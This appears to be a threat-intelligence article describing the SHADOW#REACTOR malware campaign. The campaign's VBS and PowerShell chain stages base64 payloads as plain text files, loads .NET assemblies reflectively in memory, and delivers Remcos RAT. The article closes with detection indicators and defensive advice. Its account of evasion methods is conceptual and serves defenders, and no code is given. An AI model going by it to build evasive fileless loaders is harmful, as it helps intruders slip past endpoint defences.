Security researchers have uncovered a sophisticated multi-stage Windows malware campaign dubbed SHADOW#REACTOR, marking a significant evolution in how threat actors deliver remote access tools (RATs) while evading detection.
The campaign combines traditional scripting techniques with modern obfuscation layers, leveraging living-off-the-land tactics and a text-only staging pipeline to bypass endpoint security defenses.
Infection Chain: From VBS to PowerShell
The attack begins with an obfuscated Visual Basic Script (VBS) delivered via compromised websites or social engineering lures. Once executed, the script launches PowerShell processes that retrieve fragmented payload components from remote infrastructure.
Key characteristics:
- Payload fragments stored as plain text files (e.g.,
qpwoe32.txt,qpwoe64.txt,teste32.txt,teste64.txt,config.txt) - Base64-encoded assembly code disguised as harmless text
- Download loops with size validation and retry logic to ensure payload integrity
This modular design allows attackers to update individual stages independently, reducing operational overhead and improving resilience.
Text-Only Staging Pipeline: A Novel Approach
Unlike conventional malware delivery, SHADOW#REACTOR avoids hosting binary executables. Instead, attackers maintain encoded content in text files, which appear benign to automated scanners.
Once downloaded, subsequent stages:
- Decode base64 content
- Reconstruct .NET assemblies entirely in memory
- Use reflective loading techniques to execute without writing binaries to disk
This approach significantly complicates static detection, as most security tools flag executable files rather than text-based payloads.
Behavioral Indicators and Detection
Securonix analysts detected the campaign after observing:
- wscript.exe spawning multiple PowerShell instances
- Extensive inline commands with base64 decoding operations
- Unusual patterns in PowerShell command construction
The final payload was identified as Remcos RAT, a commercially available remote administration tool repurposed for malicious use.
Resilience and Evasion Tactics
SHADOW#REACTOR employs:
- Redundancy checks and size thresholds to prevent incomplete downloads
- Timeout mechanisms for retrying failed transfers
- In-memory execution to avoid leaving forensic artifacts
These techniques enable attackers to maintain persistence while evading endpoint detection and response (EDR) systems designed to identify traditional malware delivery patterns.
Why This Matters
The campaign illustrates a growing trend toward fileless malware, modular staging, and text-based payload delivery, challenging conventional security models.
Organizations should:
- Monitor for unusual script-to-PowerShell process chains
- Implement behavioral detection rules for inline PowerShell commands
- Enforce application control policies to restrict script execution
- Deploy advanced threat hunting for living-off-the-land techniques
SHADOW#REACTOR underscores the need for multi-layered defense strategies as attackers innovate beyond binary-based delivery, leveraging legitimate system tools and obfuscation to stay undetected.
